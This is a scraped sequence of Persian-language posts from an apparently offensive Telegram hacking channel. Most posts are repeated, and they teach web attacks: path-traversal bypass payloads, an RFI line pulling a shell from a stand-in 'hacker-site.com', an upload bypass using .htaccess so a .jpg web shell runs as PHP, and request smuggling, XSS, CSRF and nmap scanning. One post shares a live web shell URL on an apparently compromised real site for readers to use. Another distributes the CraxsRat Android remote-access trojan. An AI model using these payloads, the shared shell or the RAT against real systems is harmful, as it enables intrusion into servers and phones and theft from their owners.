0Day.Today | Learn Exploit | Zero World | Dark web |
درمورد بایپس ها توی وب هکینگ صحبت کنیم ؟
درمورد بایپس توی حمله File path traversal :
من اینو قبلا درموردش توضیح دادم بازم میگم درمورد بایپس این نوع حمله
اولین نکته اینکه توی این حمله به صورت عادی اول تست کنید :
/image?filename=../../etc/passwd
خب اولین روش بایپس :
....//....//etc/passwd
دومین روش بایپس اینکه از دابل یو ار ال اینکود استفاده کنیم
سومین روش اینکه مسیر فعلیمونو داشته باشیم بعد به صورت عادی عمل کنیم :
/image?filename=/var/www/image/../../etc/passwd
چهارمین متود یا همون روش :
/image?filename=../../etc/passwd%00.jpg
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
من اینو قبلا درموردش توضیح دادم بازم میگم درمورد بایپس این نوع حمله
اولین نکته اینکه توی این حمله به صورت عادی اول تست کنید :
/image?filename=../../etc/passwd
خب اولین روش بایپس :
....//....//etc/passwd
دومین روش بایپس اینکه از دابل یو ار ال اینکود استفاده کنیم
سومین روش اینکه مسیر فعلیمونو داشته باشیم بعد به صورت عادی عمل کنیم :
/image?filename=/var/www/image/../../etc/passwd
چهارمین متود یا همون روش :
/image?filename=../../etc/passwd%00.jpg
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
❤🔥2💔1
Forwarded from imem!
در حملات HTTP Smuggling کدام یک از انکودینگهای زیر بیشتر استفاده میشود؟
Anonymous Quiz
42%
Base64
28%
Chunked
23%
UTF-8
7%
Gzip
❤🔥1👍1
باگ xss چه باگیه :
باگ xss مخفف شده cross site script هستش و به معنی عبور از اسکریپت سایت میتونیم ترجمش کنیم
باگ xss در ورودی سایت ها به وجود میاد جایی که کاربر میتونه چیزی تایپ کنه و بعد سابمیت کنه
کجاها ؟
قسمت سرچ که میتونیم چیزی بنویسم و بعد سابمیت کنیم یا قسمت نظرات سایت و...
باگ xss یعنی ما از اسکریپت سایت گذر کنیم و کد های html و javascript بتونیم اپلود کنیم
خب از طریق سایت xss میشه به اطلاعات کاربرا دسترسی پیدا کرد ؟ باید بگم اره چون کلا این باگ سمت کلاینه همونطور که میدونید یسری از باگ های ما سمت سروره یسریاشون سمت کلاینت
ما کلاینت ساید داریم سرور ساید داریم باگ ها به دو دسته تقسیم میشن باگ هایی مثل xss یا csrf سمت کلاینت ساید هستن
و حمله csrf از زیرمجموعه های باگ xss هستش
و چندین نوع xss داریم :
Xss از نوع Reflected
معمول ترین روش و رایج ترین نوعح حمله از طریق xss هستش که اسکریپت مخرب به همراه لینک برای قربانی ارسال میشه
Xss از نوع stored
خطرناک ترین نوع xss هستش که پیلود ما به صورت دائم روی سایت میمونه و هر وقت قربانی از اون قسمت سایت بازدید کنه میتونیم کوکی هارو بدزدیم باگ xss از نوع stored میتونه توی قسمت نظرات مثلا به وجود بیاد
حتی با این نوع xss میتونیم سایت رو دیفیس کنیم به صورتی که کد های ما توی سورس خودشونو سیو کنن و دیفیس ما ماندگار باشه
و نوع دیگه ای از xss نوع Dom هستش
خب حالا یه بحثی هم میمونه چجوری باید جلوی باگ xss رو بگیریم ؟
میتونیم ورودی هامونو با تابعی به اسم htmlentities() در php محدود کنیم و در نتیجه جلوی باگ xss رو بگیریم
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
باگ xss مخفف شده cross site script هستش و به معنی عبور از اسکریپت سایت میتونیم ترجمش کنیم
باگ xss در ورودی سایت ها به وجود میاد جایی که کاربر میتونه چیزی تایپ کنه و بعد سابمیت کنه
کجاها ؟
قسمت سرچ که میتونیم چیزی بنویسم و بعد سابمیت کنیم یا قسمت نظرات سایت و...
باگ xss یعنی ما از اسکریپت سایت گذر کنیم و کد های html و javascript بتونیم اپلود کنیم
خب از طریق سایت xss میشه به اطلاعات کاربرا دسترسی پیدا کرد ؟ باید بگم اره چون کلا این باگ سمت کلاینه همونطور که میدونید یسری از باگ های ما سمت سروره یسریاشون سمت کلاینت
ما کلاینت ساید داریم سرور ساید داریم باگ ها به دو دسته تقسیم میشن باگ هایی مثل xss یا csrf سمت کلاینت ساید هستن
و حمله csrf از زیرمجموعه های باگ xss هستش
و چندین نوع xss داریم :
Xss از نوع Reflected
معمول ترین روش و رایج ترین نوعح حمله از طریق xss هستش که اسکریپت مخرب به همراه لینک برای قربانی ارسال میشه
Xss از نوع stored
خطرناک ترین نوع xss هستش که پیلود ما به صورت دائم روی سایت میمونه و هر وقت قربانی از اون قسمت سایت بازدید کنه میتونیم کوکی هارو بدزدیم باگ xss از نوع stored میتونه توی قسمت نظرات مثلا به وجود بیاد
حتی با این نوع xss میتونیم سایت رو دیفیس کنیم به صورتی که کد های ما توی سورس خودشونو سیو کنن و دیفیس ما ماندگار باشه
و نوع دیگه ای از xss نوع Dom هستش
خب حالا یه بحثی هم میمونه چجوری باید جلوی باگ xss رو بگیریم ؟
میتونیم ورودی هامونو با تابعی به اسم htmlentities() در php محدود کنیم و در نتیجه جلوی باگ xss رو بگیریم
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
❤🔥5👍2💔1
🏃♂️ آموزش امنیت سایبری با حل چالش
✅ چالش در حوزه های تست نفوذ، فارنزیک، هوش تهدید و مباحث مقدماتی
🔴 رایت آپ حل چالش ها
🔰 برگزاری چالش های آنلاین به صورت Red Time و Blue Time
https://t.me/challenginno
✅ چالش در حوزه های تست نفوذ، فارنزیک، هوش تهدید و مباحث مقدماتی
🔴 رایت آپ حل چالش ها
🔰 برگزاری چالش های آنلاین به صورت Red Time و Blue Time
https://t.me/challenginno
باگ HTTP Smuggling چیه؟
ورژن HTTP/1.0:
در نسخه HTTP/1.0 برای هر درخواست HTTP یک اتصال TCP جدید باز میشد و پس از دریافت پاسخ، این اتصال بسته میشد. این رویکرد باعث افزایش بار روی شبکه و تاخیر بیشتر میشد، به خصوص وقتی درخواستهای متعددی باید پشت سر هم به یک سرور ارسال میشد.
ورژن HTTP/1.1:
در نسخه HTTP/1.1، دو قابلیت کلیدی به پروتکل اضافه شد که باعث بهینهسازی اتصالها و کاهش بار شبکه شد:
انواع Transfer-Encoding:
این هدر برای کنترل نحوه انتقال دادهها در پروتکل HTTP استفاده میشود و شامل انواع مختلفی است:
حمله HTTP Request Smuggling:
این تکنیک حمله زمانی رخ میدهد که یک کلاینت (حملهکننده) از تفاوت نحوه پردازش درخواستها بین دو سرور (مثلاً یک سرور Front-end و یک سرور Back-end) استفاده کند تا یک درخواست مخفی یا غیرمجاز را به سرور بکاند ارسال کند.
برای انجام یک حمله Request Smuggling، حداقل دو سرور در مسیر ارتباط نیاز است:
ویژگی Keep-Alive و Pipelining بین کلاینت و فرانتاند سرور برقرار است، اما بین فرانتاند و بکاند چنین نیست.
فرانتاند درخواستها را به بکاند ارسال میکند، اما بکاند نمیتواند درخواستها را به درستی پردازش کند زیرا تفاوتی در نحوه پارس کردن درخواستها بین این دو سرور وجود دارد.
مراحل حمله:
مهاجم دو درخواست به صورت پشت سر هم به فرانتاند ارسال میکند. فرانتاند ممکن است این دو درخواست را یک درخواست در نظر بگیرد و آن را به بکاند ارسال کند.
بکاند که به درستی پارس میکند، این دو درخواست را جدا از هم میبیند و پاسخ اولین درخواست را به فرانتاند ارسال میکند.
فرانتاند این پاسخ را به کلاینت برمیگرداند، اما درخواست دوم که در بافر بکاند مانده، روی درخواست بعدی قرار میگیرد.
این باعث میشود که مهاجم بتواند روی درخواست بعدی که احتمالاً از کاربر دیگری است، تغییرات ایجاد کند.
این تفاوت در نحوه پردازش و پارس کردن درخواستها بین سرورهای فرانتاند و بکاند، منجر به این حمله میشود و میتواند امنیت سرور و دادههای کاربران دیگر را به خطر بیندازد.
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
✍ imem!
ورژن HTTP/1.0:
در نسخه HTTP/1.0 برای هر درخواست HTTP یک اتصال TCP جدید باز میشد و پس از دریافت پاسخ، این اتصال بسته میشد. این رویکرد باعث افزایش بار روی شبکه و تاخیر بیشتر میشد، به خصوص وقتی درخواستهای متعددی باید پشت سر هم به یک سرور ارسال میشد.
ورژن HTTP/1.1:
در نسخه HTTP/1.1، دو قابلیت کلیدی به پروتکل اضافه شد که باعث بهینهسازی اتصالها و کاهش بار شبکه شد:
ویژگی Keep-Alive: این ویژگی اجازه میدهد که یک اتصال TCP پس از دریافت پاسخ بسته نشود و برای درخواستهای بعدی باز بماند. این قابلیت با هدر Connection: keep-alive پیادهسازی میشود. وقتی از Keep-Alive استفاده میشود، کلاینت میتواند چندین درخواست HTTP را بدون نیاز به باز و بسته کردن مداوم اتصالات TCP ارسال کند.
برای تست این قابلیت میتوان از دستور زیر استفاده کرد:curl --keepalive-time 10 http://theemi.ir/1 http://theemi.ir/2
این دستور به سرور میگوید که اتصال TCP را تا 10 ثانیه باز نگه دارد و سپس بسته شود.
ویژگی Pipelining: در این حالت، کلاینت میتواند چند درخواست HTTP را به صورت همزمان و پشت سر هم به یک اتصال ارسال کند، بدون اینکه منتظر دریافت پاسخ هر درخواست بماند. پاسخها نیز به ترتیب ارسال درخواستها از سرور دریافت میشوند.
برای تست این قابلیت:echo -en "GET /path1 HTTP/1.1\r\nHost: theemi.ir\r\n\r\nGET /path2 HTTP/1.1\r\nHost: theemi.ir\r\n\r\n" | nc theemi.ir 80
در اینجا از nc (Netcat) برای باز کردن یک اتصال TCP روی پورت 80 استفاده میشود و دو درخواست HTTP به صورت پیپلاین شده ارسال میگردند.
انواع Transfer-Encoding:
این هدر برای کنترل نحوه انتقال دادهها در پروتکل HTTP استفاده میشود و شامل انواع مختلفی است:
chunkedمهمترین و پرکاربردترین آنها در این زمینه Chunked است. در انتقال chunked، دادهها به قطعات (چانکها) تقسیم شده و به سرور ارسال میشوند. هر چانک یک سایز مشخص دارد و با پایان هر چانک، سایز بعدی ارسال میشود. این روش معمولاً در ارسال دادههای آپلودی بزرگ استفاده میشود، به طوری که سرور بتواند بدون نیاز به دانستن اندازه کامل محتوا، دادهها را دریافت کند.
compress
deflate
gzip
identity
حمله HTTP Request Smuggling:
این تکنیک حمله زمانی رخ میدهد که یک کلاینت (حملهکننده) از تفاوت نحوه پردازش درخواستها بین دو سرور (مثلاً یک سرور Front-end و یک سرور Back-end) استفاده کند تا یک درخواست مخفی یا غیرمجاز را به سرور بکاند ارسال کند.
برای انجام یک حمله Request Smuggling، حداقل دو سرور در مسیر ارتباط نیاز است:
فرانتاند(Front-end server): سروری که مستقیماً به کلاینت سرویس میدهد..
بکاند(Back-end server): سروری که درخواستهای پردازششده را از فرانتاند دریافت میکند و پاسخ نهایی را به فرانتاند میدهد
ویژگی Keep-Alive و Pipelining بین کلاینت و فرانتاند سرور برقرار است، اما بین فرانتاند و بکاند چنین نیست.
فرانتاند درخواستها را به بکاند ارسال میکند، اما بکاند نمیتواند درخواستها را به درستی پردازش کند زیرا تفاوتی در نحوه پارس کردن درخواستها بین این دو سرور وجود دارد.
مراحل حمله:
مهاجم دو درخواست به صورت پشت سر هم به فرانتاند ارسال میکند. فرانتاند ممکن است این دو درخواست را یک درخواست در نظر بگیرد و آن را به بکاند ارسال کند.
بکاند که به درستی پارس میکند، این دو درخواست را جدا از هم میبیند و پاسخ اولین درخواست را به فرانتاند ارسال میکند.
فرانتاند این پاسخ را به کلاینت برمیگرداند، اما درخواست دوم که در بافر بکاند مانده، روی درخواست بعدی قرار میگیرد.
این باعث میشود که مهاجم بتواند روی درخواست بعدی که احتمالاً از کاربر دیگری است، تغییرات ایجاد کند.
این تفاوت در نحوه پردازش و پارس کردن درخواستها بین سرورهای فرانتاند و بکاند، منجر به این حمله میشود و میتواند امنیت سرور و دادههای کاربران دیگر را به خطر بیندازد.
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
✍ imem!
❤🔥10👍4
درمورد باگ lfi و rfi و نحوه به وجود امدن این باگ ها و نحوه پچ کردنشون
Lfi مخفف شده :
Local file inclusion
باگ rfi مخفف شده :
Remote file inclusion
باگ lfi به ما اجازه میدهد سورس فایل های php سایت را فراخوانی و مشاهده کنیم :
Site.com/index.php?page=../../database.php
مثال خواندن فایل دیتابیس 👆👆
باگ rfi به ما اجازه میدهد که یک فایل txt را که سورس php یا html دارد را در روی هاست دیگر است با کامپایلر php یا html روی هاست تارگت اجرا کند
برای مثال :
target.com/index.php?page=hacker-site.com/shell.txt
همانطور که در مثال بالا میبینید هکر با استفاده از هاست خود یک فایل با سورس php و پسوند text را با کامپایلر php سایت تارگت به صورت ریموت اجرا کند که ممکن است این یک فایل مخرب مثل یک وبشل باشد
هنگامی که برنامه نویس از توابع فراخوانی بدون محدودیت یا لیمیت استفاده میکند باگ lfi یا rfi رخ میدهد مثل تابع include
برای جلوگیری از باگ lfi و rfi میتوانیم در قسمت $_GET که ورودی میگیریم در سورس php از تابع str_replace استفاده کنیم
روش دوم پچ باگ lfi و rfi استفاده از تابع strstr بعد از گرفتن ورودی در سورس php است
جلوگیری از باگ lfi و rfi با استفاده از فایل php.ini :
برای جلوگیری از باگ rfi باید در فایل php.ini قسمت allow_url_fopen را مساوی با off قرار بدیم
برای جلوگیری از باگ lfi از طریق فایل php.ini باید قسمت allow_url_include را در فایل php.ini مساوی با off قرار دهیم
استفاده از توابع زیر بدون محدودیت باعث میشود باگ lfi و rfi رخ دهد :
include - include_once - requre - requre_ons
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
Lfi مخفف شده :
Local file inclusion
باگ rfi مخفف شده :
Remote file inclusion
باگ lfi به ما اجازه میدهد سورس فایل های php سایت را فراخوانی و مشاهده کنیم :
Site.com/index.php?page=../../database.php
مثال خواندن فایل دیتابیس 👆👆
باگ rfi به ما اجازه میدهد که یک فایل txt را که سورس php یا html دارد را در روی هاست دیگر است با کامپایلر php یا html روی هاست تارگت اجرا کند
برای مثال :
target.com/index.php?page=hacker-site.com/shell.txt
همانطور که در مثال بالا میبینید هکر با استفاده از هاست خود یک فایل با سورس php و پسوند text را با کامپایلر php سایت تارگت به صورت ریموت اجرا کند که ممکن است این یک فایل مخرب مثل یک وبشل باشد
هنگامی که برنامه نویس از توابع فراخوانی بدون محدودیت یا لیمیت استفاده میکند باگ lfi یا rfi رخ میدهد مثل تابع include
برای جلوگیری از باگ lfi و rfi میتوانیم در قسمت $_GET که ورودی میگیریم در سورس php از تابع str_replace استفاده کنیم
روش دوم پچ باگ lfi و rfi استفاده از تابع strstr بعد از گرفتن ورودی در سورس php است
جلوگیری از باگ lfi و rfi با استفاده از فایل php.ini :
برای جلوگیری از باگ rfi باید در فایل php.ini قسمت allow_url_fopen را مساوی با off قرار بدیم
برای جلوگیری از باگ lfi از طریق فایل php.ini باید قسمت allow_url_include را در فایل php.ini مساوی با off قرار دهیم
استفاده از توابع زیر بدون محدودیت باعث میشود باگ lfi و rfi رخ دهد :
include - include_once - requre - requre_ons
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍7💔2❤1🔥1
Sending client data to the robot with the help of PowerShell
GITHUB
#Tools———————
IR0Day.Today Bax
@LearnExploit
GITHUB
#Tools———————
IR0Day.Today Bax
@LearnExploit
Forwarded from imem!
CraxsRats v4.9.5.rar
198 MB
craxs rat v4.9.5
Password =>
Licence :
Join => @imexemi
Password =>
@imexemi
Licence :
Attackndroid
به هیچوجه روی سیستم اصلی و گوشی خودتون امتحان نکنید
Join => @imexemi
❤🔥4👍1😁1
باگ xss و csrf مثل هم هستند در باگ csrf هکر خود را به عنوان کاربر مجاز جعل میکند و سایت این را تشخیص نمیدهد و csrf ایجاد میشود
در باگ xss از اعتماد کاربر به سایت سو استفاده میشود و در باگ csrf از اعتماد سایت به کاربر سو استفاده میشود
باگ csrf مخفف شده :
Cross site request forgery
است
بیشتر اکسپلویت های csrf با زبان html نوشته میشوند و باگ csrf چیزی را نمی سازد بلکه از امکانات سایت با جعل خود به یوزر مجاز استفاده میکند مثل add admin در بسیاری از پنل های مدیریت محتوا که باگ csrf دارند و امکان add admin را هم در پنل خود دارند
باگ csrf سمت کلاینت هست
باگ csrf سخت ترین باگ در path کردن آن است
پچ کردن باگ csrf در متود post سخت تر از پچ کردن باگ csrf در متود get است
بهترین روش برای جلوگیری از باگ csrf تعریف سشن و توکن است
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
در باگ xss از اعتماد کاربر به سایت سو استفاده میشود و در باگ csrf از اعتماد سایت به کاربر سو استفاده میشود
باگ csrf مخفف شده :
Cross site request forgery
است
بیشتر اکسپلویت های csrf با زبان html نوشته میشوند و باگ csrf چیزی را نمی سازد بلکه از امکانات سایت با جعل خود به یوزر مجاز استفاده میکند مثل add admin در بسیاری از پنل های مدیریت محتوا که باگ csrf دارند و امکان add admin را هم در پنل خود دارند
باگ csrf سمت کلاینت هست
باگ csrf سخت ترین باگ در path کردن آن است
پچ کردن باگ csrf در متود post سخت تر از پچ کردن باگ csrf در متود get است
بهترین روش برای جلوگیری از باگ csrf تعریف سشن و توکن است
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
❤2
باگ rfu باگی است که به ما اجازه میدهد فایل های غیرمجاز .html .php .txt را در سایت target آپلود کنیم و rfu مخفف شده remote file upload است
درواقع اگه اپلودری حتی فقططط فایل txt هماپلود بکنه باگ rfu داره
با استفاده از addons ها و یا اینسپکت المنت خودمون میتوانیم content type وب شل خود را به image/jpeg تغییر بدیم و بعد روی گزینه replay بزنیم و اگر آپلودر تارگت bug داشته باشه فایل .php ما اپلود میشه
کد آسیب پذیر در این نوع آپلود ها :
if ($_FILES['upload'['type']=='image/jpeg'){}
اگر اپلودر روی size فایل فیلترینگ انجام دهد باز میتوانیم با addonse و اینسپکت المنت آن آپلودر را بایپس و شل خود را آپلود کنیم
گاهی ممکن است در یک آپلودر این پسوند های . Php و... فیلتر شده باشند در این جور مواقع ممکن است نفوذگر با تغییر پسوند شل خود به jpg شل خود را آپلود کند سپس یک .htaccess آپلود کند که تمامی فایل های jpg را با کامپایلر php اجرا کند در این مواقع شل با پسوند jpg اجرا میشود
با استفاده از کد زیر که در .htaccess وارد میکنیم وب سرور تمامی فایل های با پسوند jpg را با کامپایلر php اجرا میکند در واقع ما با این روش میتوانیم شل اسکریپت خودمون رو با پسوند jpg روی سرور اجرا کنیم پس کافیه این نوع .htaccess رو روی سرور تارگت آپلود کنیم تا آن آپلودر را بایپس کنیم :
RemoveHandler .jpg
AddType application/octet-stream .php
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
درواقع اگه اپلودری حتی فقططط فایل txt هماپلود بکنه باگ rfu داره
با استفاده از addons ها و یا اینسپکت المنت خودمون میتوانیم content type وب شل خود را به image/jpeg تغییر بدیم و بعد روی گزینه replay بزنیم و اگر آپلودر تارگت bug داشته باشه فایل .php ما اپلود میشه
کد آسیب پذیر در این نوع آپلود ها :
if ($_FILES['upload'['type']=='image/jpeg'){}
اگر اپلودر روی size فایل فیلترینگ انجام دهد باز میتوانیم با addonse و اینسپکت المنت آن آپلودر را بایپس و شل خود را آپلود کنیم
گاهی ممکن است در یک آپلودر این پسوند های . Php و... فیلتر شده باشند در این جور مواقع ممکن است نفوذگر با تغییر پسوند شل خود به jpg شل خود را آپلود کند سپس یک .htaccess آپلود کند که تمامی فایل های jpg را با کامپایلر php اجرا کند در این مواقع شل با پسوند jpg اجرا میشود
با استفاده از کد زیر که در .htaccess وارد میکنیم وب سرور تمامی فایل های با پسوند jpg را با کامپایلر php اجرا میکند در واقع ما با این روش میتوانیم شل اسکریپت خودمون رو با پسوند jpg روی سرور اجرا کنیم پس کافیه این نوع .htaccess رو روی سرور تارگت آپلود کنیم تا آن آپلودر را بایپس کنیم :
RemoveHandler .jpg
AddType application/octet-stream .php
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
👍6❤1
📢 ا حتمال قطع موقت سرویسهای اینترنتی 📌
🔞 با توجه به شرایط موجود و اعلام وضعیت قرمز سازمان پدافند غیرعامل، امکان قطع موقتی سرویسها و ایران اکسس شدن برخی از دیتاسنترها و... وجود داره.
#سراسری ⚡️
@soltane_sorat
@learnexploit
🔞 با توجه به شرایط موجود و اعلام وضعیت قرمز سازمان پدافند غیرعامل، امکان قطع موقتی سرویسها و ایران اکسس شدن برخی از دیتاسنترها و... وجود داره.
#سراسری ⚡️
@soltane_sorat
@learnexploit
برای fuzz از چه ابزار هایی استفاده کنیم ؟
Dirb
gobuster
dirsearch
ffuf
Wfuzz
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
Dirb
gobuster
dirsearch
ffuf
Wfuzz
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
این اکستنشن هایی برای وب هکینگ داشته باشیم ؟
Wappalyzer
Foxy proxy
Cookie editor
Shodan
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
Wappalyzer
Foxy proxy
Cookie editor
Shodan
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
⚡2
شل برای تمرین فقط استفاده کنید حذفش نکنید بزارید بقیه هم استفاده کنن ❤️
https://bittergravity.com/test/fox63.php
#hack #Website #access #webshell
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
@Bvrce
https://bittergravity.com/test/fox63.php
#hack #Website #access #webshell
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
@Bvrce
یه نکته مهم گاهی وقتا میخواین ورژن مثلا وب سرور رو در بیارین برای اکسپلوت کردن چیکار میکنیم ؟
از ورژن اسکنر خوده nmap استفاده میکنیم :
nmap -n -O -sT -p 1-1024 ip -sv
با netcat هم میتونید ورژن اسکن کنید :
nc -nvw2 ip 20-80
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
از ورژن اسکنر خوده nmap استفاده میکنیم :
nmap -n -O -sT -p 1-1024 ip -sv
با netcat هم میتونید ورژن اسکن کنید :
nc -nvw2 ip 20-80
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
👍3
کشف فایروال های تحت وب با nmap :
1- nmap --script=http-waf-fingerprint target.com
2- nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 target.com
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
1- nmap --script=http-waf-fingerprint target.com
2- nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 target.com
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
👍3
لینک دانلود ابزار های جمع آوری اطلاعات از تارگت خودتون که میتونید تو بحث جمع اوری اطلاعات ازش استفاده کنید :
https://github.com/Tuhinshubhra/RED_HAWK
https://github.com/lanmaster53/recon-ng
https://github.com/laramies/theHarvester
https://github.com/aboul3la/Sublist3r
https://www.kali.org/tools/whatweb/
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
https://github.com/Tuhinshubhra/RED_HAWK
https://github.com/lanmaster53/recon-ng
https://github.com/laramies/theHarvester
https://github.com/aboul3la/Sublist3r
https://www.kali.org/tools/whatweb/
#hack #Website #Webhacking
〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
T.me/LearnExploit
t.me/KurtLar0101
GitHub
GitHub - Tuhinshubhra/RED_HAWK: All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool…
All in one tool for Information Gathering, Vulnerability Scanning and Crawling. A must have tool for all penetration testers - Tuhinshubhra/RED_HAWK
👍5
Forwarded from imem!
کدام یک از گزینههای زیر به درستی بیانگر عملکرد کش در سیستمهای مختلف است؟
Anonymous Quiz
33%
مرورگرها فقط فایلهای HTML را در کش خود ذخیره میکنند تا سرعت بارگذاری صفحات افزایش یابد
13%
سی دی ان فقط برای محتوای داینامیک به کار میرود و فایلهای استاتیک مانند CSS و تصاویر را کش نمیکند
29%
هدر Vary میتواند به CDN بگوید که از کدام هدرها در ساخت کشکی استفاده کند
25%
اگر نتیجه کش miss باشد، یعنی محتوا از کش بارگذاری شده و نیاز به درخواست از سرور مبدا نیست